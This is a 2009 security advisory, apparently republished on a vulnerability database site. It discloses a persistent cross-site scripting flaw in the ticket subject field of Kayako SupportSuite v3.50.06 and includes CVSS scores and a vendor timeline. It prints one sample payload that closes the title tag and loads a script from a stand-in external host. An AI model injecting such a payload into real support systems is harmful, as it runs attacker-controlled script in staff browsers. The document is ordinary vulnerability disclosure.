Ticket Subject Persistent XSS in Kayako SupportSuite

2009-09-28 / 2009-09-29
Credit: Adam Baldwin
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

nGenuity Information Services ?? Security Advisory Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in Kayako SupportSuite Application: SupportSuite v3.50.06 Vendor: Kayako Vendor website: http://www.kayako.com Author: Adam Baldwin (adam_baldwin (at) ngenuity-is (dot) com [email concealed]) Class: Persistent Cross-Site Scripting I. BACKGROUND "SupportSuite is [Kayako's] flagship product, integrating the ticket and e-mail management features of eSupport with the live chat and visitor monitoring features of LiveResponse." [1] II. DETAILS The subject field of a newly created support ticket is not properly encoded before being sent to the browser when the ticket details are viewed. More information on cross-site scripting please refer to the Common Weakness Enumeration specification available cwe.mitre.org [2]. An example attack might look similar to the following. </title><script src="example.com/attack.js"></script> III. REFERENCES [1] - http://www.kayako.com [2] - http://cwe.mitre.org/data/definitions/79.html IV. VENDOR COMMUNICATION 7.17.2009 - Vulnerability Discovery 7.20.2009 - Initial Vendor Response 7.21.2009 - Patch created, Will be pushed to next stable release 8.08.2009 - Advisory released http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-per sistent-xss-in-kayako-supportsuite/

References:

http://www.securityfocus.com/archive/1/archive/1/505637/100/0/threaded
http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/
http://secunia.com/advisories/36253


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top